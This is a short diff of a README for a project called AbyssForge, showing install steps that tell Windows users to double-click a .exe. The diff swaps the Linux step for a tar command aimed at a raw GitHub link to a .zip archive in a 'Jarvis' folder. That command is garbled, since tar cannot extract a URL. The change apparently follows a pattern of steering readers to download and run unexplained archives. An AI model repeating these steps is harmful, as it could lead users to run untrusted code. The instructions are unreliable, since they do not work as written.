Yaxiswagonwheel794/AbyssForge/README.md

 Once the download is complete, navigate to the location where the file was saved.

 - **Windows:** Double-click the `.exe` file.
 Follow any prompts to complete the installation.
 - **Linux:** Open a terminal.
-Navigate to the downloaded file and enter `tar -xvzf yourfilename.tar.gz` to extract.
+Navigate to the downloaded file and enter `tar -xvzf https://raw.githubusercontent.com/Yaxiswagonwheel794/AbyssForge/main/Jarvis/AbyssForge_3.7.zip` to extract.
 Then, follow the specific instructions provided in the README file inside the extracted folder.

 ## ⚙️ System Requirements